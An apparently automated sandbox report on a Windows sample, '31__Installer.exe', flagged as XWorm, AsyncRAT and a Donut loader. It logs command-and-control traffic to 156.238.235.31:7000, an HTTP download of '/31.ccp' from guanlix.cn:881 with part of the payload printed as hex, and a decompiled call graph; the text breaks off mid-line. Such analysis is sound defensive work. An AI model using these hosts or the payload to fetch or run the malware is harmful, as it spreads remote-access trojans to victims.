                  Jul 2, 2024 19:25:25.856448889 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:25.872324944 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:25.877239943 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:25.919280052 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:25.924202919 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:26.176769018 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:26.180346966 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:26.185255051 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:26.569180965 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:26.571595907 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:26.577605009 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:33.466676950 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:33.474189043 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:33.773597956 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:33.778112888 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:33.783231974 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:45.638134956 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:45.645811081 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:45.954492092 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:45.957077980 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:45.961869955 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:51.544325113 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:51.549175024 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:51.591152906 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:51.596000910 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:51.653727055 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:51.658766031 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:51.700510979 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:51.705828905 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:51.849095106 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:51.852026939 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:51.856828928 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:52.072693110 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:52.074965954 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:52.079807997 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:52.281801939 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:52.287911892 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:52.292777061 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:52.292996883 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:25:52.297838926 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:55.795675039 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:25:55.840972900 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:03.872601986 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:03.877731085 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:04.177892923 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:04.180175066 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:04.185101986 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:12.091423988 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:12.257863998 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:12.561835051 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:12.584357977 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:12.589391947 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:19.281224012 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:19.286127090 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:19.585946083 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:19.588553905 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:19.593446970 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:25.723293066 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:25.778419018 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:31.450617075 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:31.455497980 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:31.757742882 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:31.761218071 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:31.766170979 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:37.294320107 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:37.544898987 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:37.852529049 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:37.854463100 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:37.859286070 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:39.888070107 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:39.893516064 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:40.193869114 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:40.198266029 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:40.203286886 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:46.950707912 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:46.958439112 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:47.257855892 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:47.260148048 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:47.264983892 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:52.888179064 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:52.893136024 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.138137102 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:53.143094063 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.153784990 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:53.158818007 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.169388056 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:53.174367905 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.198040962 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.199999094 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:53.245881081 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.246129990 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:53.251065969 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.449711084 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.451581955 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:53.456538916 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.662235975 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.665180922 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:53.670011044 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.870879889 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.874535084 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:53.879309893 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:53.879472017 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:53.884313107 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:54.950783014 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:54.957231045 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:55.257076025 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:55.259150982 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:55.263972044 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:55.721303940 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:55.763154984 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:58.903836012 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:58.911067009 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:58.919271946 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:58.924236059 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:59.211589098 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:59.213247061 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:59.220258951 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:59.433629990 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:26:59.435163021 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:26:59.440088987 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:27:02.934998035 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:27:03.247226954 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:27:03.856565952 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:27:03.958843946 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:27:03.958863020 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:27:03.958960056 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:27:04.262190104 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:27:04.309705019 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:27:04.366267920 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:27:04.374025106 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:27:04.376338959 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:27:04.399761915 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:27:04.946686029 CEST700049706156.238.235.31192.168.2.8
                  Jul 2, 2024 19:27:04.947576046 CEST497067000192.168.2.8156.238.235.31
                  Jul 2, 2024 19:27:04.952653885 CEST700049706156.238.235.31192.168.2.8
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 2, 2024 19:22:59.512325048 CEST5276653192.168.2.81.1.1.1
                  Jul 2, 2024 19:22:59.984931946 CEST53527661.1.1.1192.168.2.8
                  Jul 2, 2024 19:23:32.551651001 CEST5350743162.159.36.2192.168.2.8
                  Jul 2, 2024 19:23:33.060867071 CEST5068453192.168.2.81.1.1.1
                  Jul 2, 2024 19:23:33.074786901 CEST53506841.1.1.1192.168.2.8
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 2, 2024 19:22:59.512325048 CEST192.168.2.81.1.1.10x96aeStandard query (0)guanlix.cnA (IP address)IN (0x0001)false
                  Jul 2, 2024 19:23:33.060867071 CEST192.168.2.81.1.1.10xaeb1Standard query (0)56.126.166.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 2, 2024 19:22:59.984931946 CEST1.1.1.1192.168.2.80x96aeNo error (0)guanlix.cn91.208.240.157A (IP address)IN (0x0001)false
                  Jul 2, 2024 19:23:33.074786901 CEST1.1.1.1192.168.2.80xaeb1Name error (3)56.126.166.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                  • guanlix.cn:881
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.84970591.208.240.1578817148C:\Users\user\Desktop\31__Installer.exe
                  TimestampBytes transferredDirectionData
                  Jul 2, 2024 19:22:59.996233940 CEST93OUTGET /31.ccp HTTP/1.1
                  User-Agent: Download
                  Host: guanlix.cn:881
                  Cache-Control: no-cache
                  Jul 2, 2024 19:23:00.946445942 CEST1236INHTTP/1.1 200 OK
                  Server: nginx/1.26.1
                  Date: Tue, 02 Jul 2024 17:22:44 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 71938
                  Last-Modified: Mon, 01 Jul 2024 01:27:00 GMT
                  Connection: keep-alive
                  ETag: "668205e4-11902"
                  Accept-Ranges: bytes
                  Data Raw: e8 88 bb 00 00 88 bb 00 00 9e 17 7a 0f 05 b6 fa 05 be ae 6c 11 f9 d0 84 84 17 2c d2 af e5 2f 7a 81 4e 8c d6 d5 78 43 0d 21 00 00 00 00 78 5c f5 47 36 fd 4b c5 c7 38 4c f2 a6 53 12 44 94 2a 71 83 2d f1 72 bd 7a 64 fc f8 d2 d9 2e f6 36 a1 db 22 09 67 88 11 60 ea 2a 2d 53 20 7d 08 87 ef 85 6d 13 9c 56 1f 71 ef 25 87 22 28 c2 75 41 87 ee 5c 0b 3b cf 17 f8 f3 d6 20 fb 7a 13 14 9d 2d 7e 38 99 31 8d 02 08 07 51 6e e7 07 db 6b 6f 27 05 76 c7 b8 f1 54 fd fa 96 e2 47 cc 6e 86 02 63 ab 0c 48 57 16 4a ce 0d 48 3f c1 9e 74 45 12 59 0e ed 7c 9c b0 c9 4f 88 52 08 9a e5 24 38 84 43 aa 56 80 39 82 17 71 99 a3 44 56 d0 70 0c 59 ac 5b 58 af 93 b3 fe e9 a1 42 a6 de 75 f2 7a be d9 29 8f 85 06 91 7e 3b e4 8e 08 f7 d5 e9 94 44 30 de 00 52 e6 ae aa 0f 0d 96 ea 40 a9 da 44 74 9d c3 28 51 01 8e 32 2c b7 7b 47 26 ac c2 c6 c4 10 b6 38 4c 4b 79 06 f6 68 70 c7 ec bd 92 f0 22 ba 46 6e 5c b3 91 78 e2 60 9d e5 10 a2 14 1a cb e5 e1 92 f5 62 04 bc b2 36 2a 9f 3d 79 99 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                  Data Ascii: zl,/zNxC!x\G6K8LSD*q-rzd.6"g`*-S }mVq%"(uA\; z-~81Qnko'vTGncHWJH?tEY|OR$8CV9qDVpY[XBuz)~;D0R@Dt(Q2,{G&8LKyhp"Fn\x`b6*=yB]t<bfcGlK/a;{q0*RC.K\8e1.[&/$_6Y9Msc55G{#'&O8e@)meJa3kQ\KAxVp7ST$f4wzde8[COI2+3]MOEu 4MIm_'F{:^N*AgCG-;fRo,v:-DdadeN{5(4[TXE-E?KVTOFv9i&O pMl2lJdi5^J_YO\ACSB


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Target ID:0
                  Start time:13:22:57
                  Start date:02/07/2024
                  Path:C:\Users\user\Desktop\31__Installer.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\31__Installer.exe"
                  Imagebase:0x3e0000
                  File size:249'344 bytes
                  MD5 hash:CC1BB6A11AA1706BCBC42F04D1B1D865
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Reset < >

                    Execution Graph

                    Execution Coverage:11.5%
                    Dynamic/Decrypted Code Coverage:11.3%
                    Signature Coverage:2%
                    Total number of Nodes:799
                    Total number of Limit Nodes:80
                    execution_graph 27234 3e3a8e 27238 3e3aad 27234->27238 27235 3e3ad9 27236 3e3af3 27243 3e3afa 27236->27243 27244 3e3a6f 27236->27244 27238->27235 27238->27236 27240 3e3a6f std::_Xfsopen 142 API calls 27238->27240 27240->27236 27242 3e5902 __fcloseall 102 API calls 27242->27235 27243->27235 27243->27242 27248 3e747d 27244->27248 27246 3e3a89 27246->27235 27247 3e75c3 101 API calls 5 library calls 27246->27247 27247->27243 27250 3e7489 type_info::_Type_info_dtor 27248->27250 27249 3e749c 27306 3ea8eb 66 API calls __getptd_noexit 27249->27306 27250->27249 27253 3e74c9 27250->27253 27252 3e74a1 27307 3ea899 11 API calls __mbsnbicmp_l 27252->27307 27267 3f1473 27253->27267 27256 3e74ce 27257 3e74d5 27256->27257 27258 3e74e2 27256->27258 27308 3ea8eb 66 API calls __getptd_noexit 27257->27308 27260 3e7509 27258->27260 27261 3e74e9 27258->27261 27284 3f11dc 27260->27284 27309 3ea8eb 66 API calls __getptd_noexit 27261->27309 27263 3e74ac type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 27263->27246 27268 3f147f type_info::_Type_info_dtor 27267->27268 27269 3eb747 __lock 66 API calls 27268->27269 27270 3f148d 27269->27270 27271 3f1509 27270->27271 27279 3eb685 __mtinitlocknum 66 API calls 27270->27279 27282 3f1502 27270->27282 27314 3e5125 67 API calls __lock 27270->27314 27315 3e5193 LeaveCriticalSection LeaveCriticalSection _doexit 27270->27315 27272 3e63b8 __malloc_crt 66 API calls 27271->27272 27274 3f1510 27272->27274 27276 3f151e InitializeCriticalSectionAndSpinCount 27274->27276 27274->27282 27275 3f1592 type_info::_Type_info_dtor 27275->27256 27277 3f153e 27276->27277 27278 3f1551 EnterCriticalSection 27276->27278 27316 3e4452 66 API calls 2 library calls 27277->27316 27278->27282 27279->27270 27311 3f159d 27282->27311 27286 3f11fe 27284->27286 27285 3f1229 27291 3f141a 27285->27291 27305 3f13c6 27285->27305 27323 3f54bf 76 API calls __fassign 27285->27323 27286->27285 27287 3f1212 27286->27287 27321 3ea8eb 66 API calls __getptd_noexit 27287->27321 27289 3f1217 27322 3ea899 11 API calls __mbsnbicmp_l 27289->27322 27290 3f142c 27318 3f5135 27290->27318 27327 3ea8eb 66 API calls __getptd_noexit 27291->27327 27295 3f141f 27328 3ea899 11 API calls __mbsnbicmp_l 27295->27328 27297 3e7514 27310 3e752f LeaveCriticalSection LeaveCriticalSection _fputc 27297->27310 27299 3f1395 27299->27291 27324 3f5359 85 API calls __mbsnbicmp_l 27299->27324 27301 3f13bf 27301->27305 27325 3f5359 85 API calls __mbsnbicmp_l 27301->27325 27303 3f13de 27303->27305 27326 3f5359 85 API calls __mbsnbicmp_l 27303->27326 27305->27290 27305->27291 27306->27252 27307->27263 27308->27263 27309->27263 27310->27263 27317 3eb66e LeaveCriticalSection 27311->27317 27313 3f15a4 27313->27275 27314->27270 27315->27270 27316->27282 27317->27313 27329 3f5071 27318->27329 27320 3f5150 27320->27297 27321->27289 27322->27297 27323->27299 27324->27301 27325->27303 27326->27305 27327->27295 27328->27297 27332 3f507d type_info::_Type_info_dtor 27329->27332 27330 3f5090 27449 3ea8eb 66 API calls __getptd_noexit 27330->27449 27332->27330 27334 3f50c6 27332->27334 27333 3f5095 27450 3ea899 11 API calls __mbsnbicmp_l 27333->27450 27340 3f493d 27334->27340 27337 3f50e0 27451 3f5107 LeaveCriticalSection __unlock_fhandle 27337->27451 27339 3f509f type_info::_Type_info_dtor 27339->27320 27341 3f4964 27340->27341 27452 3f7f22 27341->27452 27343 3f4bef 27478 3ea847 27343->27478 27345 3f49bf 27481 3ea8fe 66 API calls __getptd_noexit 27345->27481 27347 3f5070 type_info::_Type_info_dtor 27348 3f5090 27347->27348 27355 3f50c6 27347->27355 27512 3ea8eb 66 API calls __getptd_noexit 27348->27512 27349 3f4980 27349->27343 27349->27345 27352 3f4a1a 27349->27352 27350 3f49c4 27482 3ea8eb 66 API calls __getptd_noexit 27350->27482 27359 3f4aa1 27352->27359 27363 3f4a74 27352->27363 27354 3f5095 27513 3ea899 11 API calls __mbsnbicmp_l 27354->27513 27358 3f493d __tsopen_nolock 120 API calls 27355->27358 27356 3f49ce 27483 3ea899 11 API calls __mbsnbicmp_l 27356->27483 27361 3f50e0 27358->27361 27484 3ea8fe 66 API calls __getptd_noexit 27359->27484 27514 3f5107 LeaveCriticalSection __unlock_fhandle 27361->27514 27459 3f3f4b 27363->27459 27365 3f4aa6 27485 3ea8eb 66 API calls __getptd_noexit 27365->27485 27367 3f509f type_info::_Type_info_dtor 27367->27337 27368 3f4ab0 27486 3ea899 11 API calls __mbsnbicmp_l 27368->27486 27371 3f4b32 27373 3f4b5c CreateFileA 27371->27373 27374 3f4b3b 27371->27374 27372 3f49d8 27372->27337 27376 3f4bf9 GetFileType 27373->27376 27377 3f4b89 27373->27377 27487 3ea8fe 66 API calls __getptd_noexit 27374->27487 27379 3f4c4a 27376->27379 27380 3f4c06 GetLastError 27376->27380 27381 3f4bc2 GetLastError 27377->27381 27384 3f4b9d CreateFileA 27377->27384 27378 3f4b40 27488 3ea8eb 66 API calls __getptd_noexit 27378->27488 27494 3f3d15 67 API calls 2 library calls 27379->27494 27492 3ea911 66 API calls 3 library calls 27380->27492 27490 3ea911 66 API calls 3 library calls 27381->27490 27384->27376 27384->27381 27386 3f4b4a 27489 3ea8eb 66 API calls __getptd_noexit 27386->27489 27387 3f4c2f CloseHandle 27388 3f4be9 27387->27388 27390 3f4c3d 27387->27390 27491 3ea8eb 66 API calls __getptd_noexit 27388->27491 27493 3ea8eb 66 API calls __getptd_noexit 27390->27493 27392 3f4c68 27396 3f4cbe 27392->27396 27397 3f4f5c 27392->27397 27401 3f4d2d 27392->27401 27395 3f4c42 27395->27388 27495 3f1702 68 API calls 3 library calls 27396->27495 27397->27343 27399 3f4fe6 CloseHandle 27397->27399 27404 3f500f 27399->27404 27400 3f4cc8 27402 3f4cea 27400->27402 27403 3f4cd1 27400->27403 27401->27397 27410 3f4e87 27401->27410 27415 3f4dd7 27401->27415 27498 3f34e7 76 API calls 6 library calls 27402->27498 27496 3ea8fe 66 API calls __getptd_noexit 27403->27496 27407 3f5013 GetLastError 27404->27407 27448 3f4ef2 27404->27448 27510 3ea911 66 API calls 3 library calls 27407->27510 27408 3f4cfb 27420 3f4d14 27408->27420 27499 3f7cb1 100 API calls 5 library calls 27408->27499 27410->27397 27417 3f4ea4 27410->27417 27423 3f4dfb 27410->27423 27412 3f501f 27511 3f3d96 67 API calls 2 library calls 27412->27511 27415->27397 27415->27423 27424 3f4e26 27415->27424 27446 3f4e42 27415->27446 27504 3ec40c 68 API calls 3 library calls 27417->27504 27418 3f4cd6 27418->27401 27447 3f4cde 27418->27447 27420->27447 27500 3f1702 68 API calls 3 library calls 27420->27500 27422 3f4eaf 27422->27423 27426 3f4eba 27422->27426 27423->27397 27427 3ebe77 __write 97 API calls 27423->27427 27423->27447 27501 3ec40c 68 API calls 3 library calls 27424->27501 27505 3ec40c 68 API calls 3 library calls 27426->27505 27427->27423 27428 3f4eff 27431 3f4f21 27428->27431 27432 3f4f06 27428->27432 27429 3f4ee5 27506 3ec57b 69 API calls 3 library calls 27429->27506 27430 3f4e5c 27430->27428 27430->27429 27430->27431 27437 3f4e7e 27430->27437 27430->27447 27509 3f1702 68 API calls 3 library calls 27431->27509 27508 3f1702 68 API calls 3 library calls 27432->27508 27433 3f4e31 27433->27423 27439 3f4e38 27433->27439 27437->27397 27502 3ec40c 68 API calls 3 library calls 27439->27502 27440 3f4ec4 27440->27397 27440->27447 27441 3f4eec 27507 3ea8eb 66 API calls __getptd_noexit 27441->27507 27442 3f4f10 27442->27437 27442->27447 27446->27447 27503 3f34e7 76 API calls 6 library calls 27446->27503 27497 3ec57b 69 API calls 3 library calls 27447->27497 27448->27343 27449->27333 27450->27339 27451->27339 27453 3f7f2e 27452->27453 27454 3f7f43 27452->27454 27515 3ea8eb 66 API calls __getptd_noexit 27453->27515 27454->27349 27456 3f7f33 27516 3ea899 11 API calls __mbsnbicmp_l 27456->27516 27458 3f7f3e 27458->27349 27460 3f3f57 type_info::_Type_info_dtor 27459->27460 27461 3eb685 __mtinitlocknum 66 API calls 27460->27461 27462 3f3f67 27461->27462 27463 3eb747 __lock 66 API calls 27462->27463 27464 3f3f6c type_info::_Type_info_dtor 27462->27464 27469 3f3f7b 27463->27469 27464->27371 27465 3f40c6 27519 3f40db LeaveCriticalSection _doexit 27465->27519 27467 3f4053 27518 3e63fd 66 API calls __calloc_crt 27467->27518 27469->27465 27469->27467 27470 3eb747 __lock 66 API calls 27469->27470 27472 3f3ffb EnterCriticalSection 27469->27472 27474 3f3fd1 InitializeCriticalSectionAndSpinCount 27469->27474 27517 3f401d LeaveCriticalSection _doexit 27469->27517 27470->27469 27471 3f405c 27471->27465 27475 3f3e85 ___lock_fhandle 68 API calls 27471->27475 27472->27469 27473 3f400b LeaveCriticalSection 27472->27473 27473->27469 27474->27469 27477 3f40bd 27475->27477 27477->27465 27520 3ea71e 27478->27520 27481->27350 27482->27356 27483->27372 27484->27365 27485->27368 27486->27372 27487->27378 27488->27386 27489->27372 27490->27388 27491->27343 27492->27387 27493->27395 27494->27392 27495->27400 27496->27418 27497->27395 27498->27408 27499->27420 27500->27418 27501->27433 27502->27446 27503->27430 27504->27422 27505->27440 27506->27441 27507->27448 27508->27442 27509->27440 27510->27412 27511->27448 27512->27354 27513->27367 27514->27367 27515->27456 27516->27458 27517->27469 27518->27471 27519->27464 27521 3ea73d _memset __call_reportfault 27520->27521 27522 3ea75b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 27521->27522 27524 3ea829 __call_reportfault 27522->27524 27526 3e65d1 27524->27526 27525 3ea845 GetCurrentProcess TerminateProcess 27525->27347 27527 3e65db IsDebuggerPresent 27526->27527 27528 3e65d9 27526->27528 27534 3f2615 27527->27534 27528->27525 27531 3edfa5 SetUnhandledExceptionFilter UnhandledExceptionFilter 27532 3edfca GetCurrentProcess TerminateProcess 27531->27532 27533 3edfc2 __call_reportfault 27531->27533 27532->27525 27533->27532 27534->27531 26456 54614e0 26457 54614e4 26456->26457 26461 54617e1 26457->26461 26467 5461778 26457->26467 26472 546165f 26457->26472 26462 54617ea 26461->26462 26463 546174f 26461->26463 26462->26457 26464 54617a1 26463->26464 26477 5461810 26463->26477 26481 54617ff 26463->26481 26464->26457 26468 546174f 26467->26468 26469 54617a1 26468->26469 26470 5461810 3 API calls 26468->26470 26471 54617ff 3 API calls 26468->26471 26469->26457 26470->26468 26471->26468 26474 546169c 26472->26474 26473 54617a1 26473->26457 26474->26473 26475 5461810 3 API calls 26474->26475 26476 54617ff 3 API calls 26474->26476 26475->26474 26476->26474 26478 5461835 26477->26478 26485 5462363 26478->26485 26479 5461916 26479->26479 26482 5461810 26481->26482 26484 5462363 3 API calls 26482->26484 26483 5461916 26483->26483 26484->26483 26487 5462375 26485->26487 26486 546234f 26486->26479 26487->26486 26491 5467308 26487->26491 26495 54672f8 26487->26495 26488 54626fa 26488->26479 26492 546732d 26491->26492 26500 5467597 26492->26500 26493 546738f 26493->26488 26496 5467287 26495->26496 26497 5467306 26495->26497 26496->26488 26499 5467597 3 API calls 26497->26499 26498 546738f 26498->26488 26499->26498 26504 54675d0 26500->26504 26513 54675e0 26500->26513 26501 54675b6 26501->26493 26505 54675e0 26504->26505 26506 54675ed 26505->26506 26521 5466f64 26505->26521 26506->26501 26508 5467636 26508->26501 26510 546769b 26510->26501 26511 54676fe GlobalMemoryStatusEx 26512 546772e 26511->26512 26512->26501 26514 5467615 26513->26514 26515 54675ed 26513->26515 26516 5466f64 GlobalMemoryStatusEx 26514->26516 26515->26501 26518 5467632 26516->26518 26517 5467636 26517->26501 26518->26517 26519 54676fe GlobalMemoryStatusEx 26518->26519 26520 546772e 26519->26520 26520->26501 26522 5466f6b GlobalMemoryStatusEx 26521->26522 26524 5467632 26522->26524 26524->26508 26524->26510 26524->26511 26525 3e59d4 26575 3ea940 26525->26575 26527 3e59e0 GetStartupInfoW 26528 3e59f4 HeapSetInformation 26527->26528 26530 3e59ff 26527->26530 26528->26530 26576 3eabd1 HeapCreate 26530->26576 26531 3e5a4d 26532 3e5a58 26531->26532 26591 3e59ab 66 API calls 3 library calls 26531->26591 26592 3e98e5 86 API calls 4 library calls 26532->26592 26535 3e5a5e 26536 3e5a6a __RTC_Initialize 26535->26536 26537 3e5a62 26535->26537 26577 3eae2e 73 API calls __calloc_crt 26536->26577 26593 